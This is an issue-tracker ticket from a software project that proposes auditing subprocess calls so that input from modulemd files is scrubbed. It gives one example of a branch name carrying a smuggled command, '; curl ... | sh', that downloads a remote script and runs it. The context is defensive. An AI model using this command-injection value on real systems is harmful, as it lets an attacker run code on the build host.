#329 [audit] ensure that any shell execution scrubs untrusted input.
Closed: Fixed 7 years ago Opened 7 years ago by ralph.

Theory: if someone crafted a modulemd file with an rpm listed in it and the branchname for that rpm was foo; curl http://threebean.org/exploit-the-box.sh | sh, we would pass that branch name through and become compromised.

The purpose of this ticket is to search for all cases of shell/subprocess execution, and to ensure that we're scrubbing any input coming from modulemd files.


Note - it looks like this is not possible atm. We do not pass shell=True to subprocess.Popen().

We should write a unit test that tries to achieve this exploit, and ensure that it fails.

Metadata Update from @ralph:
- Issue assigned to ralph

7 years ago

Login to comment on this ticket.

Metadata